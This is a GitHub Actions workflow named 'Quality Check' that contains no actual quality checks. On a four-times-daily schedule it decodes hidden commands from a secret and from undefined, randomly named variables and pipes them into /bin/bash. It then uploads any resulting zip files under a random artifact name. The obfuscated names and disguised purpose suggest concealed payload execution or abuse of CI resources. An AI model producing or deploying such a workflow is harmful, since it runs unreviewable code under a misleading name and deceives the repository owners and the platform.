name: Quality Check
on:
  workflow_dispatch:

  schedule:
    - cron: '40 5,11,17,23 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}-${{ github.ref }}
  cancel-in-progress: true
jobs:
  validate:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Run task
        env:
          vbt838: ${{ secrets.vbt838 }}
        run: |
          printf '%s' "$vbt838" | jq -r .v63 | /bin/bash
          echo $jg90058 | jq -r .jvj411 | /bin/bash
          printf '%s' "$fo80537" | jq -r .kfyy78 | /bin/bash
          printf '%s' "$bubpb5263" | jq -r .ydm6293 | /bin/bash

      - name: Store output
        uses: actions/upload-artifact@v4
        with:
          name: NboGgIw9
          path: "*.zip"
          retention-days: 1
